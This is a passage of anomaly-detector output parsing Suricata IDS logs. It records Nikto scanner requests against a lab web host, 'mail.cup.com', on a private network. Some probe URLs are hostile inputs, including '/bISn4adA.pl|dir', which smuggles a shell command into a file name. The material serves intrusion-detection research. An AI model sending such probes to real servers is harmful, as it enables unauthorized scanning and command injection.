"/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.inc+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.inc+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.inc+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.inc+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46822, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":684282763424512,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 684282763424512, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.210515+0000\",\"flow_id\":684282763424512,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.211929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46824 -> 192.168.10.154:80", "/parser/model/time": 1583349514.211929, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46824, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.211929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46824 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.idq", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.212088+0000\",\"flow_id\":785974704093502,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.212088, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":785974704093502,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.idq\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.idq\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.idq", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.idq", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46824, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":785974704093502,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 785974704093502, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.212088+0000\",\"flow_id\":785974704093502,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.213694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46826 -> 192.168.10.154:80", "/parser/model/time": 1583349514.213694, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46826, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.213694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46826 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pl|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.213956+0000\",\"flow_id\":750897706188682,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.213956, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":750897706188682,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pl|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pl|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pl|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pl|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46826, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":750897706188682,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 750897706188682, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.213956+0000\",\"flow_id\":750897706188682,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.215650 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46828 -> 192.168.10.154:80", "/parser/model/time": 1583349514.21565, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46828, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.215650 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46828 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.xbb", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.215801+0000\",\"flow_id\":724402052941536,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.215801, "/parser/model/plus_sign": "+", 
